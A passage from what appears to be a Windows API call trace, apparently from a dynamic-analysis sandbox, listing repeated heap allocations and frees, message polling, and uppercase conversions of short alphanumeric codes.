(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0219.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0219.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0219.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0219.667] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0219.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0219.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0219.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0219.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab338 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0219.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0219.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0219.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0219.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0219.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0219.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0219.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0219.670] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0219.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0219.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0219.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0219.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0219.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.672] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0219.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.673] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0219.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0219.673] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0219.674] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0219.674] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0219.674] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0219.674] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0219.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0219.675] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, 